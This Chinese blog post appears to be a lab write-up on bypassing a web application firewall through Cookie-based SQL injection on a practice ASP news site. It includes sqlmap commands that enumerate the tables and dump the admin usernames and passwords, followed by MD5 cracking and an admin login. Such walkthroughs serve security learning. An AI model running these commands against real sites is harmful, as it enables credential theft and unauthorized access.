利用Cookie注入 绕过WAF

日期: 栏目:跨境 浏览:1500 评论:0

sql注入之绕过waf(cookie注入)

我们看一下题目:

网址:http://kypt8004.ia.aqlab.cn/index.asp

利用Cookie注入 绕过WAF-第1张图片-Ceacer网络利用Cookie注入 绕过WAF-第2张图片-Ceacer网络

点击一条新闻,查看相关信息

http://kypt8004.ia.aqlab.cn/shownews.asp?id=171

利用Cookie注入 绕过WAF-第3张图片-Ceacer网络利用Cookie注入 绕过WAF-第4张图片-Ceacer网络

 进行简单注入测试

利用Cookie注入 绕过WAF-第5张图片-Ceacer网络利用Cookie注入 绕过WAF-第6张图片-Ceacer网络

利用Cookie注入 绕过WAF-第7张图片-Ceacer网络

 我们再来看一下该表的列数

进过测试,当order by =11时,会显示数据库错误,可想该表的列数为10列,如图所示。

利用Cookie注入 绕过WAF-第8张图片-Ceacer网络利用Cookie注入 绕过WAF-第9张图片-Ceacer网络

 当我们使用union关键字再一次进行测试的时候,waf又将其过滤掉

利用Cookie注入 绕过WAF-第10张图片-Ceacer网络利用Cookie注入 绕过WAF-第11张图片-Ceacer网络

 所以到这里,我们可以想到,waf设置有一个黑名单过滤问题

(在此处,还调试了大小写编码,一些其他绕过方式,但是都没成功)

所以我们在这里使用Cookie绕过。

使用Burp抓包,改一下Cookie看一下效果

抓住一个包:

利用Cookie注入 绕过WAF-第12张图片-Ceacer网络

 修改Cookie

利用Cookie注入 绕过WAF-第13张图片-Ceacer网络

 我们发现,只是爆出错误,并没有waf提示,所以绕过成功

我们可以sqlmap跑一下数据

利用Cookie注入 绕过WAF-第14张图片-Ceacer网络

 

 利用Cookie注入 绕过WAF-第15张图片-Ceacer网络

 

 跑一下表(tables)

sqlmap>sqlmap.py -u "http://kypt8004.ia.aqlab.cn/shownews.asp?" --cookie="id=171" --level 2 --tables

利用Cookie注入 绕过WAF-第16张图片-Ceacer网络

 

 跑出admin表的列

 sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 -T admin --column

利用Cookie注入 绕过WAF-第17张图片-Ceacer网络

 

 接下里,我们跑一下username和password

 sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 --dump -T admin -C username,password

利用Cookie注入 绕过WAF-第18张图片-Ceacer网络

 

 

 我们在MD5解密后,在在进行一次扫描网站

利用Cookie注入 绕过WAF-第19张图片-Ceacer网络

 

 我们现在去扫描网站,在进行一次登录。(使用御剑)

利用Cookie注入 绕过WAF-第20张图片-Ceacer网络

 

 找到一个登录,进行登录

评论留言

我要留言

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。发布前请先查看评论规则:点我查看